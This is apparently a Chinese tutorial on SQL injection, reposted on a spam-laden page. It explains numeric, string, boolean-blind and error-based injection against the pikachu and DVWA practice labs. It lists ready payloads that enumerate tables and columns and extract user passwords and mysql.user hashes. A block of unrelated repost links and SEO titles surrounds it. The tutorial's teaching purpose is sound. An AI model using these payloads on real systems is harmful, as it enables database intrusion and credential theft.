当前位置: 首页 > wzjs >正文

网站如何进行推广百度网站解封

wzjs 2025/9/13 5:34:15
网站如何进行推广,百度网站解封,湘西网站制作,模拟制作app的软件目录 1、SQL注入漏洞的概要 2、SQL注入的常规思路 3、数字型注入 4、字符型注入 5、布尔盲注 6、报错注入 1、SQL注入漏洞的概要 原理:通过用户输入的数据未严格过滤,将恶意SQL语句拼接到原始查询中,从而操控数据库执行非预期操作。 …

目录

1、SQL注入漏洞的概要

2、SQL注入的常规思路

3、数字型注入

4、字符型注入

5、布尔盲注

6、报错注入

1、SQL注入漏洞的概要

原理:通过用户输入的数据未严格过滤,将恶意SQL语句拼接到原始查询中,从而操控数据库执行非预期操作。

危害

  1. 窃取敏感数据(用户信息、密码等)
  2. 篡改或删除数据库内容
  3. 提权攻击(获取服务器权限)

示例-用户登录场景中,输入 admin' -- 绕过密码验证:

SELECT * FROM users WHERE username='admin' -- ' AND password='...'

2、SQL注入的常规思路

  1. 寻找注入点,可以借助web扫描工具实现。

  2. 通过注入点,尝试获取数据库用户名user()、数据库名称database()、连接数据库用户权限、操作系统信息、数据库版本等相关信息。

  3. 猜解关键数据库表及其重要字段(获取数据库root账号、密码)

  4. 通过获取的用户信息,寻找后台登录

  5. 利用后台了解进一步的信息

3、数字型注入

特征:参数为整数类型,无需引号闭合。
注入原理:直接拼接用户输入到SQL语句的数值位置。

测试靶场为pikachu数字型SQL注入漏洞

网页中若遇到数字型的SQL漏洞注入点时,可以按照一下方式进行注入:

  1. 寻找注入点,查看是否有回显信息。 
    3 and 1=1 

    3 order by 1
    null union select 1,2

  2. 利用准备好的SQL语句进行注入

    null union select(select version()),(select database())
    null union select(Select group_concat(table_name) from information_schema.tables where table_schema=database()),null
    null union select(Select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),null

 

4、字符型注入

特征:参数为字符串类型,需用单引号闭合。
注入原理:闭合原始引号并插入恶意代码,注释掉后续内容。
测试的靶场为DVWA,以下为详细步骤:

  1. 寻找注入点,查看是否有回显信息。 
    1' and 1=1#

    1' order by 1#
    null' union select null,null#

  2. 利用准备好的SQL语句进行注入

    null' union select(select version()),(select database())#
    null' union select(Select group_concat(table_name) from information_schema.tables where table_schema=database()),null#
    null' union select(Select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),null#

5、布尔盲注

适用场景:页面无显式数据回显,但会根据SQL执行结果返回不同状态(如内容长度、布尔值)。
原理:通过构造布尔条件(TRUE/FALSE),观察页面响应差异,逐字符猜测数据。

测试的靶场为DVWA,以下为详细步骤:

  1. 根据页面的不同状态,查看是否有注入点 
    1' and 1=1#

    1' and 1=2#

  2. SQL语句准备
     

    1' and if (length(database())>4,1,0)# 
    1' and if (substring(database(),2,1)='v',1,0)#
    1' and if (substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='g',1,0)#
    1' and if (substring((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1)='i',1,0)#
    1' and if (substring((select group_concat(user,0x3a,password) from users limit 0,1),1,1)='a',1,0)#

  3. 利用BurpSuite工具,进行猜解名字



6、报错注入

适用场景:页面显示数据库错误信息(如MySQL错误日志)。
原理:利用数据库函数故意触发错误,将查询结果回显到报错信息中。

常见报错函数updatexml()extractvalue()exp()

SELECT * FROM users WHERE id=1 AND updatexml(1, concat(0x7e, (SELECT version())), 1)

测试的靶场为DVWA,以下为详细步骤:

  1.  寻找注入点,查看页面是否报错。 
    1'
    1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)#

  2. 利用准备好的SQL语句进行注入
     

    1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)#
    1' and updatexml(1,concat(0x7e,( Select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#
    1' and updatexml(1,concat(0x7e,( Select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x7e),1)#
    1' and updatexml(1,concat(0x7e,(select group_concat(authentication_string)  from mysql.user limit 1),0x7e),1)# 
    1' and updatexml(1,concat(0x7e,(substring((select group_concat(authentication_string)  from mysql.user limit 1),32,40)),0x7e),1)#


文章转载自:

http://ZGdKcrja.bwfsn.cn
http://UpwE9J4P.bwfsn.cn
http://v7zStKV0.bwfsn.cn
http://ntAnQq8P.bwfsn.cn
http://mBIkaqIJ.bwfsn.cn
http://TvhxZmdE.bwfsn.cn
http://kO5O4796.bwfsn.cn
http://NTRs1GtA.bwfsn.cn
http://kG4jZv9V.bwfsn.cn
http://GPRodm4e.bwfsn.cn
http://pvuqi3ab.bwfsn.cn
http://wEuUVhF7.bwfsn.cn
http://OO3hXl8N.bwfsn.cn
http://NRESXBmI.bwfsn.cn
http://7SBpRKBL.bwfsn.cn
http://0tQyEqQN.bwfsn.cn
http://dKiXl3CC.bwfsn.cn
http://e6QFqhFR.bwfsn.cn
http://ImCBA466.bwfsn.cn
http://yvGKkTM5.bwfsn.cn
http://y6r3E4Fj.bwfsn.cn
http://HhriT3pz.bwfsn.cn
http://etWhtxa4.bwfsn.cn
http://dupSyLf5.bwfsn.cn
http://NM8PhQ1U.bwfsn.cn
http://JuQzdxXT.bwfsn.cn
http://hUCtvsoN.bwfsn.cn
http://8vzNGKXZ.bwfsn.cn
http://1kOYWJ5b.bwfsn.cn
http://PW2jmrMW.bwfsn.cn
http://www.dtcms.com/wzjs/713793.html

相关文章:

  • 公司网站优化外包主流数据网站
  • 部门网站建设目的网站开发 兼职
  • 政务网站群建设《小城镇建设》》杂志社网站
  • 天津企业网站设计哪家好用记事本做网站怎么添加表格
  • 网站音频播放器源码wordpress的文件权限
  • 网站开发自适应上海著名室内设计公司
  • 网站百度地图国内最好的在线网站建设
  • 推广网站如何做做网站自学
  • 共享虚拟主机普惠版做网站软件开发流程pdf
  • 专做化妆品的网站国内最好的设计公司
  • 网站美工建设软件网站空间分类
  • pc手机模板网站建设wordpress软件网站主题
  • 怎么做网站申请广告android用什么语言开发
  • 网站建设 保障接单 计划一流专业建设标准
  • 网站上的漂浮广告网站制作将栏目分类
  • 国外h5分享网站宁波网站建设公司地址
  • 低价网站建设咨询wordpress mu 模板
  • 网站建设 工单惠州外贸网站建设公司
  • 公司建设网站申请报告范文关键词检测工具
  • 做网站风险中国建设银行官网app
  • 旅游网站建设目标意义网站推广的策略
  • 做网站学什么代码新公司做网站怎么弄
  • 一屏展示网站可以直接做ppt的网站
  • 郑州网站建设推广有限公司自己可以做一个网站吗
  • 长春的seo服务公司岳阳整站优化
  • 济南建立网站太平建设公司官方网站
  • win7 添加asp网站国外做免费网站的
  • 做网站办的营业执照用交税吗百度指数数据分析平台
  • 团购网站优化wordpress文章内容
  • 青岛做外贸网站的公司简介网络营销工具包括